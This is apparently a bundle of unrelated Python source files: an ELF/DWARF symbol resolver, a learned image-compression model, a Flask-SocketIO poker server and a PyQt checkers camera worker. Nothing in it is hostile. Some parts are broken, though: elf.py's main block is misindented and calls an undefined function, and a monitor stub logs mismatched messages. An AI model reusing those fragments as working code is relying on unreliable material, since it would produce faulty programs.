    exception is swallowed by the handler — confirm whether this stub is
    intentional.
    """
    try:
        ps = Ps(1)
        ps.start(10)
    except Exception, e:
        logging.error("linux process monitor stop: " + str(e.args))
        logging.error("linux command monitor stop: " + str(e.args))
        logging.error("linux networks monitor stop: " + str(e.args))
if __name__ == '__main__':
    main()
|
<filename>pmu-tools-master/parser/elf.py<gh_stars>0
#!/usr/bin/env python
# resolve ELF and DWARF symbol tables using elftools
#
# Copyright (c) 2013-2014, Intel Corporation
# Author: <NAME>
#
# This program is free software; you can redistribute it and/or modify it
# under the terms and conditions of the GNU General Public License,
# version 2, as published by the Free Software Foundation.
#
# This program is distributed in the hope it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
# more details.
from elftools.common.py3compat import maxint, bytes2str
from elftools.elf.elffile import ELFFile
from elftools.elf.sections import SymbolTableSection
import elftools.common.exceptions
import util
import kernel
# global caches
open_files = dict()
resolved = dict()
symtables = dict()
lines = dict()
def build_line_table(dwarfinfo):
    """Build a sorted list of (start_addr, end_addr, filename, line) tuples
    from the DWARF line programs of every compilation unit."""
    lines = []
    for CU in dwarfinfo.iter_CUs():
        lp = dwarfinfo.line_program_for_CU(CU)
        prevstate = None
        for entry in lp.get_entries():
            # Skip entries that carry no address state or terminate a sequence.
            if entry.state is None or entry.state.end_sequence:
                continue
            if prevstate:
                # Each row covers [prev address, current address) and maps to
                # the file/line of the previous state.
                lines.append((prevstate.address,
                              entry.state.address,
                              lp['file_entry'][prevstate.file - 1].name,
                              prevstate.line))
            prevstate = entry.state
    lines.sort()
    return lines
def build_symtab(elffile):
    """Build a sorted list of (start, end, name) tuples for all named
    STT_FUNC symbols in the ELF file's symbol tables."""
    syms = []
    for section in elffile.iter_sections():
        if isinstance(section, SymbolTableSection):
            for nsym, sym in enumerate(section.iter_symbols()):
                name = bytes2str(sym.name)
                if not name:
                    continue
                # Only function symbols are useful for address resolution.
                if sym.entry.st_info.type != 'STT_FUNC':
                    continue
                end = sym['st_value'] + sym['st_size']
                syms.append((sym['st_value'], end,
                             bytes2str(sym.name)))
    syms.sort()
    return syms
reported = set()
def find_elf_file(fn):
    """Open (and cache in `open_files`) the ELF file at path fn.

    Returns the ELFFile object, or None for pseudo paths / unreadable files.
    Unopenable files are reported once (tracked via the `reported` set).
    """
    if fn.startswith("//"):
        # Pseudo paths (e.g. //anon mappings) cannot be opened.
        return None
    if fn in open_files:
        elffile = open_files[fn]
    else:
        try:
            # NOTE(review): the file handle is intentionally kept open for the
            # process lifetime because ELFFile reads lazily.
            f = open(fn, 'rb')
            elffile = ELFFile(f)
            open_files[fn] = elffile
        except (IOError, elftools.common.exceptions.ELFError):
            if fn not in reported:
                print "Cannot open", fn
                reported.add(fn)
            return None
    return elffile
def resolve_line(fn, ip):
    """Resolve address `ip` in ELF file `fn` to a "file:line" string.

    Returns "?" when the file cannot be opened, or None when no line
    information covers the address. The per-file DWARF line table is built
    lazily and cached in the module-level `lines` dict.
    """
    elffile = find_elf_file(fn)
    if elffile is None:
        return "?"
    if fn not in lines and elffile.has_dwarf_info():
        lines[fn] = build_line_table(elffile.get_dwarf_info())
    src = None
    # BUG FIX: the original tested `resolve_line and fn in lines` —
    # `resolve_line` is this function object and is always truthy, so the
    # extra operand was vacuous (and misleading). Test only the cache.
    if fn in lines:
        pos = util.find_le(lines[fn], ip)
        if pos:
            src = "%s:%d" % (pos[2], pos[3])
    return src
# global one hit cache
# helps a lot for LBR decoding
# tbd use a small list with LRU?
last_sym = None
def resolve_sym(fn, ip):
    """Resolve address `ip` in ELF file `fn` to (symbol_name, offset).

    Returns ("?", 0) when the file cannot be opened or is malformed, and
    (None, None) when no symbol covers the address.
    """
    elffile = find_elf_file(fn)
    if elffile is None:
        return "?", 0
    global last_sym
    try:
        # Build and cache the symbol table for this file on first use.
        if fn not in symtables:
            symtables[fn] = build_symtab(elffile)
        # One-entry cache: consecutive lookups often hit the same function.
        # NOTE(review): last_sym is read but never assigned anywhere in this
        # module, so the cache never populates — confirm intended behavior.
        if last_sym and last_sym[0] <= ip <= last_sym[1]:
            return last_sym[2], ip - last_sym[0]
        loc = None
        offset = None
        if fn in symtables:
            sym = util.find_le(symtables[fn], ip)
            if sym:
                loc, offset = sym[2], ip - sym[0]
    except elftools.common.exceptions.ELFError:
        return "?", 0
    return loc, offset
def resolve_ip(filename, foffset, ip, need_line):
    """Resolve an address to (symbol, symbol_offset, source_line).

    User-space addresses (filename starting with '/') are resolved against
    the ELF file — first by file offset, then falling back to the raw ip;
    source line lookup is only done when need_line is set. Anything else is
    treated as a kernel address and delegated to kernel.resolve_kernel.
    """
    sym, soffset, line = None, 0, None
    if filename and filename.startswith("/"):
        sym, soffset = resolve_sym(filename, foffset)
        if not sym:
            sym, soffset = resolve_sym(filename, ip)
        if need_line:
            line = resolve_line(filename, ip)
    else:
        sym, soffset = kernel.resolve_kernel(ip)
    return sym, soffset, line
if __name__ == '__main__':
import sys
print resolve_addr(sys.argv[1], int(sys.argv[2], 16))
print resolve_line(sys.argv[1], int(sys.argv[2], 16))
|
<filename>src/model.py
"""
Stitches submodels together.
"""
import numpy as np
import time, os
import itertools
from functools import partial
from collections import defaultdict, namedtuple
import torch
import torch.nn as nn
import torch.nn.functional as F
# Custom modules
from src import hyperprior
from src.loss import losses
from src.helpers import maths, datasets, utils
from src.network import encoder, generator, discriminator, hyper
from src.loss.perceptual_similarity import perceptual_loss as ps
from default_config import ModelModes, ModelTypes, hific_args, directories
Intermediates = namedtuple("Intermediates",
["input_image", # [0, 1] (after scaling from [0, 255])
"reconstruction", # [0, 1]
"latents_quantized", # Latents post-quantization.
"n_bpp", # Differential entropy estimate.
"q_bpp"]) # Shannon entropy estimate.
Disc_out= namedtuple("disc_out",
["D_real", "D_gen", "D_real_logits", "D_gen_logits"])
class Model(nn.Module):
    """HiFiC-style learned image compression model.

    Stitches the Encoder, Hyperprior, Generator and (for GAN training)
    Discriminator submodels together, and computes the rate, distortion,
    perceptual and adversarial losses.
    """

    def __init__(self, args, logger, storage_train=defaultdict(list), storage_test=defaultdict(list), model_mode=ModelModes.TRAINING,
                 model_type=ModelTypes.COMPRESSION):
        # NOTE(review): the mutable default arguments (defaultdict(list)) are
        # shared across all instances that rely on the defaults — confirm
        # this is intended (callers in __main__ pass them explicitly).
        super(Model, self).__init__()
        """
        Builds hific model from submodels in network.
        """
        self.args = args
        self.model_mode = model_mode
        self.model_type = model_type
        self.logger = logger
        self.log_interval = args.log_interval
        self.storage_train = storage_train
        self.storage_test = storage_test
        self.step_counter = 0
        if self.args.use_latent_mixture_model is True:
            self.args.latent_channels = self.args.latent_channels_DLMM
        # Validate mode/type against the known enumerations early.
        if not hasattr(ModelTypes, self.model_type.upper()):
            raise ValueError("Invalid model_type: [{}]".format(self.model_type))
        if not hasattr(ModelModes, self.model_mode.upper()):
            raise ValueError("Invalid model_mode: [{}]".format(self.model_mode))
        self.image_dims = self.args.image_dims  # Assign from dataloader
        self.batch_size = self.args.batch_size
        # Actual entropy coding is only performed at evaluation time.
        self.entropy_code = False
        if model_mode == ModelModes.EVALUATION:
            self.entropy_code = True
        self.Encoder = encoder.Encoder(self.image_dims, self.batch_size, C=self.args.latent_channels,
            channel_norm=self.args.use_channel_norm)
        self.Generator = generator.Generator(self.image_dims, self.batch_size, C=self.args.latent_channels,
            n_residual_blocks=self.args.n_residual_blocks, channel_norm=self.args.use_channel_norm, sample_noise=
            self.args.sample_noise, noise_dim=self.args.noise_dim)
        # Choose between the discretized-logistic-mixture hyperprior and the
        # standard mean-scale hyperprior.
        if self.args.use_latent_mixture_model is True:
            self.Hyperprior = hyperprior.HyperpriorDLMM(bottleneck_capacity=self.args.latent_channels,
                likelihood_type=self.args.likelihood_type, mixture_components=self.args.mixture_components, entropy_code=self.entropy_code)
        else:
            self.Hyperprior = hyperprior.Hyperprior(bottleneck_capacity=self.args.latent_channels,
                likelihood_type=self.args.likelihood_type, entropy_code=self.entropy_code)
        # Submodels whose parameters are trained with the amortized objective.
        self.amortization_models = [self.Encoder, self.Generator]
        self.amortization_models.extend(self.Hyperprior.amortization_models)
        # Use discriminator if GAN mode enabled and in training/validation
        self.use_discriminator = (
            self.model_type == ModelTypes.COMPRESSION_GAN
            and (self.model_mode != ModelModes.EVALUATION)
        )
        if self.use_discriminator is True:
            assert self.args.discriminator_steps > 0, 'Must specify nonzero training steps for D!'
            self.discriminator_steps = self.args.discriminator_steps
            self.logger.info('GAN mode enabled. Training discriminator for {} steps.'.format(
                self.discriminator_steps))
            self.Discriminator = discriminator.Discriminator(image_dims=self.image_dims,
                context_dims=self.args.latent_dims, C=self.args.latent_channels)
            self.gan_loss = partial(losses.gan_loss, args.gan_loss_type)
        else:
            self.discriminator_steps = 0
            self.Discriminator = None
        self.squared_difference = torch.nn.MSELoss(reduction='none')
        # Expects [-1,1] images or [0,1] with normalize=True flag
        self.perceptual_loss = ps.PerceptualLoss(model='net-lin', net='alex', use_gpu=torch.cuda.is_available(), gpu_ids=[args.gpu])

    def store_loss(self, key, loss):
        """Append a scalar loss value to the train or test storage dict."""
        assert type(loss) == float, 'Call .item() on loss before storage'
        if self.training is True:
            storage = self.storage_train
        else:
            storage = self.storage_test
        # NOTE(review): self.writeout is only assigned in forward(); calling
        # store_loss before any forward() would raise AttributeError.
        if self.writeout is True:
            storage[key].append(loss)

    def compression_forward(self, x):
        """
        Forward pass through encoder, hyperprior, and decoder.
        Inputs
        x: Input image. Format (N,C,H,W), range [0,1],
        or [-1,1] if args.normalize_image is True
        torch.Tensor
        Outputs
        intermediates: NamedTuple of intermediate values
        """
        image_dims = tuple(x.size()[1:])  # (C,H,W)
        # At evaluation time, pad the input so spatial dims are divisible by
        # the encoder's total downsampling factor.
        if self.model_mode == ModelModes.EVALUATION and (self.training is False):
            n_encoder_downsamples = self.Encoder.n_downsampling_layers
            factor = 2 ** n_encoder_downsamples
            x = utils.pad_factor(x, x.size()[2:], factor)
        # Encoder forward pass
        y = self.Encoder(x)
        # Same padding logic for the hyper-encoder's downsampling.
        if self.model_mode == ModelModes.EVALUATION and (self.training is False):
            n_hyperencoder_downsamples = self.Hyperprior.analysis_net.n_downsampling_layers
            factor = 2 ** n_hyperencoder_downsamples
            y = utils.pad_factor(y, y.size()[2:], factor)
        hyperinfo = self.Hyperprior(y, spatial_shape=x.size()[2:])
        latents_quantized = hyperinfo.decoded
        total_nbpp = hyperinfo.total_nbpp
        total_qbpp = hyperinfo.total_qbpp
        # Use quantized latents as input to G
        reconstruction = self.Generator(latents_quantized)
        if self.args.normalize_input_image is True:
            reconstruction = torch.tanh(reconstruction)
        # Undo padding
        if self.model_mode == ModelModes.EVALUATION and (self.training is False):
            reconstruction = reconstruction[:, :, :image_dims[1], :image_dims[2]]
        intermediates = Intermediates(x, reconstruction, latents_quantized,
                                      total_nbpp, total_qbpp)
        return intermediates, hyperinfo

    def discriminator_forward(self, intermediates, train_generator):
        """ Train on gen/real batches simultaneously. """
        x_gen = intermediates.reconstruction
        x_real = intermediates.input_image
        # Alternate between training discriminator and compression models
        if train_generator is False:
            x_gen = x_gen.detach()
        # Stack real and generated batches so D sees both in one pass.
        D_in = torch.cat([x_real, x_gen], dim=0)
        latents = intermediates.latents_quantized.detach()
        # Duplicate the latent conditioning to match the doubled batch.
        latents = torch.repeat_interleave(latents, 2, dim=0)
        D_out, D_out_logits = self.Discriminator(D_in, latents)
        D_out = torch.squeeze(D_out)
        D_out_logits = torch.squeeze(D_out_logits)
        # Split back into the real and generated halves.
        D_real, D_gen = torch.chunk(D_out, 2, dim=0)
        D_real_logits, D_gen_logits = torch.chunk(D_out_logits, 2, dim=0)
        return Disc_out(D_real, D_gen, D_real_logits, D_gen_logits)

    def distortion_loss(self, x_gen, x_real):
        """Mean squared error between reconstruction and input in [0,255] space."""
        # loss in [0,255] space but normalized by 255 to not be too big
        # - Delegate scaling to weighting
        sq_err = self.squared_difference(x_gen*255., x_real*255.)  # / 255.
        return torch.mean(sq_err)

    def perceptual_loss_wrapper(self, x_gen, x_real, normalize=True):
        """ Assumes inputs are in [0, 1] if normalize=True, else [-1, 1] """
        LPIPS_loss = self.perceptual_loss.forward(x_gen, x_real, normalize=normalize)
        return torch.mean(LPIPS_loss)

    def compression_loss(self, intermediates, hyperinfo):
        """Combine weighted rate, distortion and perceptual losses, and log
        the individual terms every log_interval steps."""
        x_real = intermediates.input_image
        x_gen = intermediates.reconstruction
        if self.args.normalize_input_image is True:
            # [-1.,1.] -> [0.,1.]
            x_real = (x_real + 1.) / 2.
            x_gen = (x_gen + 1.) / 2.
        distortion_loss = self.distortion_loss(x_gen, x_real)
        perceptual_loss = self.perceptual_loss_wrapper(x_gen, x_real, normalize=True)
        weighted_distortion = self.args.k_M * distortion_loss
        weighted_perceptual = self.args.k_P * perceptual_loss
        weighted_rate, rate_penalty = losses.weighted_rate_loss(self.args, total_nbpp=intermediates.n_bpp,
            total_qbpp=intermediates.q_bpp, step_counter=self.step_counter, ignore_schedule=self.args.ignore_schedule)
        weighted_R_D_loss = weighted_rate + weighted_distortion
        weighted_compression_loss = weighted_R_D_loss + weighted_perceptual
        # Bookkeeping
        if (self.step_counter % self.log_interval == 1):
            self.store_loss('rate_penalty', rate_penalty)
            self.store_loss('distortion', distortion_loss.item())
            self.store_loss('perceptual', perceptual_loss.item())
            self.store_loss('n_rate', intermediates.n_bpp.item())
            self.store_loss('q_rate', intermediates.q_bpp.item())
            self.store_loss('n_rate_latent', hyperinfo.latent_nbpp.item())
            self.store_loss('q_rate_latent', hyperinfo.latent_qbpp.item())
            self.store_loss('n_rate_hyperlatent', hyperinfo.hyperlatent_nbpp.item())
            self.store_loss('q_rate_hyperlatent', hyperinfo.hyperlatent_qbpp.item())
            self.store_loss('weighted_rate', weighted_rate.item())
            self.store_loss('weighted_distortion', weighted_distortion.item())
            self.store_loss('weighted_perceptual', weighted_perceptual.item())
            self.store_loss('weighted_R_D', weighted_R_D_loss.item())
            self.store_loss('weighted_compression_loss_sans_G', weighted_compression_loss.item())
        return weighted_compression_loss

    def GAN_loss(self, intermediates, train_generator=False):
        """
        train_generator: Flag to send gradients to generator
        """
        disc_out = self.discriminator_forward(intermediates, train_generator)
        D_loss = self.gan_loss(disc_out, mode='discriminator_loss')
        G_loss = self.gan_loss(disc_out, mode='generator_loss')
        # Bookkeeping
        if (self.step_counter % self.log_interval == 1):
            self.store_loss('D_gen', torch.mean(disc_out.D_gen).item())
            self.store_loss('D_real', torch.mean(disc_out.D_real).item())
            self.store_loss('disc_loss', D_loss.item())
            self.store_loss('gen_loss', G_loss.item())
            self.store_loss('weighted_gen_loss', (self.args.beta * G_loss).item())
        return D_loss, G_loss

    def compress(self, x, silent=False):
        """
        * Pass image through encoder to obtain latents: x -> Encoder() -> y
        * Pass latents through hyperprior encoder to obtain hyperlatents:
        y -> hyperencoder() -> z
        * Encode hyperlatents via nonparametric entropy model.
        * Pass hyperlatents through mean-scale hyperprior decoder to obtain mean,
        scale over latents: z -> hyperdecoder() -> (mu, sigma).
        * Encode latents via entropy model derived from (mean, scale) hyperprior output.
        """
        assert self.model_mode == ModelModes.EVALUATION and (self.training is False), (
            f'Set model mode to {ModelModes.EVALUATION} for compression.')
        spatial_shape = tuple(x.size()[2:])
        # Pad input so spatial dims divide the encoder's downsampling factor.
        if self.model_mode == ModelModes.EVALUATION and (self.training is False):
            n_encoder_downsamples = self.Encoder.n_downsampling_layers
            factor = 2 ** n_encoder_downsamples
            x = utils.pad_factor(x, x.size()[2:], factor)
        # Encoder forward pass
        y = self.Encoder(x)
        # Same padding for the hyper-encoder.
        if self.model_mode == ModelModes.EVALUATION and (self.training is False):
            n_hyperencoder_downsamples = self.Hyperprior.analysis_net.n_downsampling_layers
            factor = 2 ** n_hyperencoder_downsamples
            y = utils.pad_factor(y, y.size()[2:], factor)
        compression_output = self.Hyperprior.compress_forward(y, spatial_shape)
        # Attained bpp assumes 32 bits per encoded element.
        attained_hbpp = 32 * len(compression_output.hyperlatents_encoded) / np.prod(spatial_shape)
        attained_lbpp = 32 * len(compression_output.latents_encoded) / np.prod(spatial_shape)
        attained_bpp = 32 * ((len(compression_output.hyperlatents_encoded) +
                              len(compression_output.latents_encoded)) / np.prod(spatial_shape))
        if silent is False:
            self.logger.info('[ESTIMATED]')
            self.logger.info(f'BPP: {compression_output.total_bpp:.3f}')
            self.logger.info(f'HL BPP: {compression_output.hyperlatent_bpp:.3f}')
            self.logger.info(f'L BPP: {compression_output.latent_bpp:.3f}')
            self.logger.info('[ATTAINED]')
            self.logger.info(f'BPP: {attained_bpp:.3f}')
            self.logger.info(f'HL BPP: {attained_hbpp:.3f}')
            self.logger.info(f'L BPP: {attained_lbpp:.3f}')
        return compression_output

    def decompress(self, compression_output):
        """
        * Recover z* from compressed message.
        * Pass recovered hyperlatents through mean-scale hyperprior decoder obtain mean,
        scale over latents: z -> hyperdecoder() -> (mu, sigma).
        * Use latent entropy model to recover y* from compressed image.
        * Pass quantized latent through generator to obtain the reconstructed image.
        y* -> Generator() -> x*.
        """
        assert self.model_mode == ModelModes.EVALUATION and (self.training is False), (
            f'Set model mode to {ModelModes.EVALUATION} for decompression.')
        latents_decoded = self.Hyperprior.decompress_forward(compression_output, device=utils.get_device())
        # Use quantized latents as input to G
        reconstruction = self.Generator(latents_decoded)
        if self.args.normalize_input_image is True:
            reconstruction = torch.tanh(reconstruction)
        # Undo padding
        image_dims = compression_output.spatial_shape
        reconstruction = reconstruction[:, :, :image_dims[0], :image_dims[1]]
        if self.args.normalize_input_image is True:
            # [-1.,1.] -> [0.,1.]
            reconstruction = (reconstruction + 1.) / 2.
        reconstruction = torch.clamp(reconstruction, min=0., max=1.)
        return reconstruction

    def forward(self, x, train_generator=False, return_intermediates=False, writeout=True):
        """Training/eval entry point.

        Returns (reconstruction, q_bpp) in EVALUATION mode; otherwise a dict
        of losses ('compression' and, in GAN mode, 'disc'), optionally with
        the intermediates namedtuple.
        """
        self.writeout = writeout
        losses = dict()
        if train_generator is True:
            # Define a 'step' as one cycle of G-D training
            self.step_counter += 1
        intermediates, hyperinfo = self.compression_forward(x)
        if self.model_mode == ModelModes.EVALUATION:
            reconstruction = intermediates.reconstruction
            if self.args.normalize_input_image is True:
                # [-1.,1.] -> [0.,1.]
                reconstruction = (reconstruction + 1.) / 2.
            reconstruction = torch.clamp(reconstruction, min=0., max=1.)
            return reconstruction, intermediates.q_bpp
        compression_model_loss = self.compression_loss(intermediates, hyperinfo)
        if self.use_discriminator is True:
            # Only send gradients to generator when training generator via
            # `train_generator` flag
            D_loss, G_loss = self.GAN_loss(intermediates, train_generator)
            weighted_G_loss = self.args.beta * G_loss
            compression_model_loss += weighted_G_loss
            losses['disc'] = D_loss
        losses['compression'] = compression_model_loss
        # Bookkeeping
        if (self.step_counter % self.log_interval == 1):
            self.store_loss('weighted_compression_loss', compression_model_loss.item())
        if return_intermediates is True:
            return losses, intermediates
        else:
            return losses
if __name__ == '__main__':
    # Smoke test: build the model, enumerate its parameter groups, and run
    # either a compression round-trip or a single training forward pass.
    compress_test = False
    if compress_test is True:
        model_mode = ModelModes.EVALUATION
    else:
        model_mode = ModelModes.TRAINING
    logger = utils.logger_setup(logpath=os.path.join(directories.experiments, 'logs'), filepath=os.path.abspath(__file__))
    device = utils.get_device()
    logger.info(f'Using device {device}')
    storage_train = defaultdict(list)
    storage_test = defaultdict(list)
    model = Model(hific_args, logger, storage_train, storage_test, model_mode=model_mode, model_type=ModelTypes.COMPRESSION_GAN)
    model.to(device)
    logger.info(model)
    transform_param_names = list()
    transform_params = list()
    logger.info('ALL PARAMETERS')
    for n, p in model.named_parameters():
        # Collect encoder/generator and hyper analysis/synthesis parameters.
        if ('Encoder' in n) or ('Generator' in n):
            transform_param_names.append(n)
            transform_params.append(p)
        if ('analysis' in n) or ('synthesis' in n):
            transform_param_names.append(n)
            transform_params.append(p)
        logger.info(f'{n} - {p.shape}')
    logger.info('AMORTIZATION PARAMETERS')
    amortization_named_parameters = itertools.chain.from_iterable(
        [am.named_parameters() for am in model.amortization_models])
    for n, p in amortization_named_parameters:
        logger.info(f'{n} - {p.shape}')
    # NOTE(review): this heading duplicates the one above although it lists
    # the transform parameters — likely meant 'TRANSFORM PARAMETERS'.
    logger.info('AMORTIZATION PARAMETERS')
    for n, p in zip(transform_param_names, transform_params):
        logger.info(f'{n} - {p.shape}')
    logger.info('HYPERPRIOR PARAMETERS')
    for n, p in model.Hyperprior.hyperlatent_likelihood.named_parameters():
        logger.info(f'{n} - {p.shape}')
    if compress_test is False:
        logger.info('DISCRIMINATOR PARAMETERS')
        for n, p in model.Discriminator.named_parameters():
            logger.info(f'{n} - {p.shape}')
    logger.info("Number of trainable parameters: {}".format(utils.count_parameters(model)))
    logger.info("Estimated size: {} MB".format(utils.count_parameters(model) * 4. / 10**6))
    B = 10
    shape = [B, 3, 256, 256]
    x = torch.randn(shape).to(device)
    start_time = time.time()
    if compress_test is True:
        model.eval()
        logger.info('Starting compression with input shape {}'.format(shape))
        compression_output = model.compress(x)
        reconstruction = model.decompress(compression_output)
        logger.info(f"n_bits: {compression_output.total_bits}")
        logger.info(f"bpp: {compression_output.total_bpp}")
        logger.info(f"MSE: {torch.mean(torch.square(reconstruction - x)).item()}")
    else:
        logger.info('Starting forward pass with input shape {}'.format(shape))
        losses = model(x)
        compression_loss, disc_loss = losses['compression'], losses['disc']
    logger.info('Delta t {:.3f}s'.format(time.time() - start_time))
|
<reponame>liona24/pokerv
from collections import defaultdict
from flask import Flask, render_template, request
from flask_socketio import SocketIO, emit, join_room,\
leave_room, close_room
from gameplay import Room, HumanPlayer, AiPlayer
import serialization as ser
app = Flask(__name__,
static_folder='../dist/static',
template_folder='../dist',
instance_relative_config=True)
app.config.from_object('settings')
app.config.from_envvar('SERVER_SETTINGS', silent=True)
socketio = SocketIO(app)
rooms = {}
# stores temporary lock events which are used to wake the gameplay thread
# access through event_storage[room_name][name]
# each 'event' consists of an threading.Event and associated data
event_storage = defaultdict(dict)
def response(status, code, msg):
    """Build the uniform acknowledgement payload returned to socket.io callers."""
    payload = dict(status=status, code=code, msg=msg)
    return payload
def hand_finished(summary, room):
    """Broadcast the serialized end-of-hand summary to everyone in `room`."""
    socketio.emit('hand finished', ser.serialize_summary(summary), room=room)
def update_players(room):
    """Push the room's current player list to all of its connected clients."""
    socketio.emit('players changed', { 'players': room.serialize_players() },
                  room=room.name)
@app.route('/', methods=[ 'GET' ])
def index():
    """Serve the single-page client application."""
    return render_template('index.html')
@socketio.on('playpause')
def play_pause(args):
    """Start or stop the game in a room.

    args: {'room': str, 'play': truthy to start / falsy to stop}.
    Returns the standard response dict; 404 when the room is unknown.
    """
    room = args['room']
    play = args['play'] # check if this is actually casting correctly
    try:
        if play:
            # start_game returns a (status, code, msg) tuple; the callback
            # broadcasts each finished hand to the room.
            return response(
                *rooms[room].start_game(lambda s: hand_finished(s, room)))
        else:
            return response(*rooms[room].stop_game())
    except KeyError:
        return response('err', 404, "The specified room does not exist!")
@socketio.on('move')
def move(args):
    """Deliver a player's move to the waiting gameplay thread.

    The gameplay thread parks an event in event_storage[room][name] while it
    waits for this player; popping it hands over the move data and wakes the
    thread. A missing event means it is not this player's turn.
    """
    room = args['room']
    name = args['name']
    event = event_storage[room].pop(name, None)
    if event is None:
        return response('err', 404, "It is not '%s's turn!" % name)
    event.data.update(args)
    event.set()
    return response('ok', 200, None)
@socketio.on('create')
def create(args):
    """Create a new room from size/blind/stack settings.

    Fails with 404 when the room name is already in use. The confirmation
    message is sent only to the creating client (request.sid).
    """
    room = args['room']
    size = int(args['size'])
    blinds = (int(args['smallblind']), int(args['bigblind']))
    initstack = int(args['stacksize'])
    if room not in rooms:
        rooms[room] = Room(room, size, initstack, blinds)
        emit('message', "Created room '%s'!" % room, room=request.sid)
        return response('ok', 200, None)
    return response('err', 404, 'The desired room is already in use!')
@socketio.on('join')
def join(args):
    """Seat a human or AI player at an existing room's table.

    args: {'room': str, 'user': str, 'player_type': 'human' or anything else
    for an AI}. On success the client joins the socket.io room and all
    clients receive the updated player list.
    """
    room_name = args['room']
    user_name = args['user']
    player_type = args['player_type']
    try:
        room = rooms[room_name]
        typ = HumanPlayer if player_type == 'human' else AiPlayer
        player = typ(user_name,
                     room.initstack,
                     request.sid,
                     room,
                     socketio,
                     event_storage)
        status, errno, msg = room.join(player)
        if status == 'ok':
            join_room(room_name)
            emit('message', 'Player %s entered the table!' % user_name,
                 room=room_name)
            update_players(room)
        return response(status, errno, msg)
    except KeyError:
        return response('err', 404, 'This room does not exist!')
@socketio.on('leave')
def leave(args):
    """Remove a player from a room; tear the room down when it empties."""
    room = args['room']
    user = args['user']
    if room in rooms:
        status, errno, msg = rooms[room].leave(user)
        if status == 'ok':
            leave_room(room)
            if rooms[room].isempty:
                # Last player gone: close the socket.io room and forget it.
                close_room(room)
                rooms.pop(room)
            else:
                emit('message',
                     "Player '%s' left the table!" % user,
                     room=room)
                update_players(rooms[room])
        return response(status, errno, msg)
    return response('err', 404, 'This room does not exist!')
if __name__ == '__main__':
    # Development entry point; DEBUG comes from settings / SERVER_SETTINGS.
    socketio.run(app, debug=app.config['DEBUG'])
|
<filename>checkers/gui/worker.py
import urllib.request
import cv2
import numpy as np
from PyQt5.QtCore import QObject, pyqtSignal, pyqtSlot, Qt
from PyQt5.QtGui import QImage
from checkers.image.board import detect_board, create_board_matrix
from checkers.image.pawn_colour import PawnColour, opposite
from checkers.logic.move import check_move
from checkers.logic.move_status import MoveStatus
class Worker(QObject):
    """Background worker that streams board photos from an IP camera,
    detects the checkers board and validates moves.

    Runs on its own Qt thread and communicates with the GUI exclusively
    through the signals below.
    """

    new_board_ready_signal = pyqtSignal(np.ndarray)   # detected board matrix
    new_image_ready_signal = pyqtSignal(QImage)       # camera frame for display
    new_label_ready_signal = pyqtSignal(str)          # status label text
    new_pawns_label_ready_signal = pyqtSignal(str)    # pawn-count label text
    new_button_label_ready_signal = pyqtSignal(str)   # action-button caption

    def __init__(self, parent=None):
        QObject.__init__(self, parent=parent)
        self.should_emit = False                  # set by the GUI to request a board update
        self.before_matrix = None                 # board state before the latest move
        self.after_matrix = None                  # board state after the latest move
        self.player_colour = PawnColour.WHITE     # whose turn it is

    @pyqtSlot()
    def capture_video(self):
        """Main worker loop: fetch camera frames forever; when the GUI sets
        should_emit, detect the board and validate the move."""
        # NOTE(review): camera address is hard-coded — consider making it configurable.
        url = 'http://192.168.1.58:8080/shot.jpg'
        while True:
            img_response = urllib.request.urlopen(url)
            img_np = np.array(bytearray(img_response.read()), dtype=np.uint8)
            image = cv2.imdecode(img_np, -1)
            # Qt expects RGB ordering; OpenCV decodes as BGR.
            rgb_image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
            h, w, ch = rgb_image.shape
            bytes_per_line = ch * w
            q_image = QImage(rgb_image.data, w, h, bytes_per_line, QImage.Format_RGB888)
            q_image = q_image.scaled(640, 480, Qt.KeepAspectRatio)
            self.new_image_ready_signal.emit(q_image)
            if self.should_emit:
                print('Click!')
                self.before_matrix = self.after_matrix
                board = detect_board(image)
                if board is not None:
                    self.after_matrix = create_board_matrix(board)
                    if self.before_matrix is not None:
                        self.__make_move()
                    else:
                        # First successful detection: publish the initial position.
                        self.emit_new_board(self.after_matrix)
                        self.emit_new_pawns_label(self.count_pawns_and_display(self.after_matrix))
                        self.emit_new_label('Make a move - white turn')
                        self.emit_new_button_label('Update the board')
                self.should_emit = False

    @pyqtSlot(np.ndarray)
    def emit_new_board(self, board):
        """Forward a detected board matrix to the GUI."""
        self.new_board_ready_signal.emit(board)

    def set_should_emit(self):
        """Called from the GUI thread to request processing of the next frame."""
        self.should_emit = True

    @pyqtSlot(str)
    def emit_new_label(self, text):
        self.new_label_ready_signal.emit(text)

    @pyqtSlot(str)
    def emit_new_pawns_label(self, text):
        self.new_pawns_label_ready_signal.emit(text)

    @pyqtSlot(str)
    def emit_new_button_label(self, text):
        self.new_button_label_ready_signal.emit(text)

    def __make_move(self):
        """Validate the transition before_matrix -> after_matrix and update
        the GUI; on an invalid/undefined move the new state is discarded."""
        move = check_move(self.before_matrix, self.after_matrix, self.player_colour)
        if move == MoveStatus.CORRECT:
            self.emit_new_board(self.after_matrix)
            self.player_colour = opposite(self.player_colour)
            # str(PawnColour.X)[11:] strips the 'PawnColour.' prefix.
            self.emit_new_label('Correct move - ' + str(self.player_colour)[11:].lower() + ' turn')
            self.emit_new_pawns_label(self.count_pawns_and_display(self.after_matrix))
        elif move == MoveStatus.INCORRECT:
            self.emit_new_label('Incorrect move - ' + str(self.player_colour)[11:].lower() + ' turn')
            self.after_matrix = self.before_matrix
        elif move == MoveStatus.UNDEFINED:
            self.emit_new_label('Undefined move - ' + str(self.player_colour)[11:].lower() + ' turn')
            self.after_matrix = self.before_matrix
        elif move == MoveStatus.GAME_OVER:
            self.emit_new_board(self.after_matrix)
            self.player_colour = PawnColour.WHITE
            self.emit_new_label('Game over - ' + str(self.player_colour)[11:].lower() + ' wins')
            self.emit_new_button_label('Start over')
            self.emit_new_pawns_label(self.count_pawns_and_display(self.after_matrix))
            self.after_matrix = None
        elif move == MoveStatus.NO_CHANGE:
            self.emit_new_label('No change detected - ' + str(self.player_colour)[11:].lower() + ' turn')

    @staticmethod
    def count_pawns_and_display(board):
        """Count pawns on the board matrix (1 = black, 2 = white) and format
        the label text shown in the GUI."""
        white_pawns_count = 0
        black_pawns_count = 0
        for i in np.nditer(board):
            if i == 1:
                black_pawns_count += 1
            if i == 2:
                white_pawns_count += 1
        return "White pawns count: " + str(white_pawns_count) + " \t Black pawns count: " + str(black_pawns_count)
|
'''
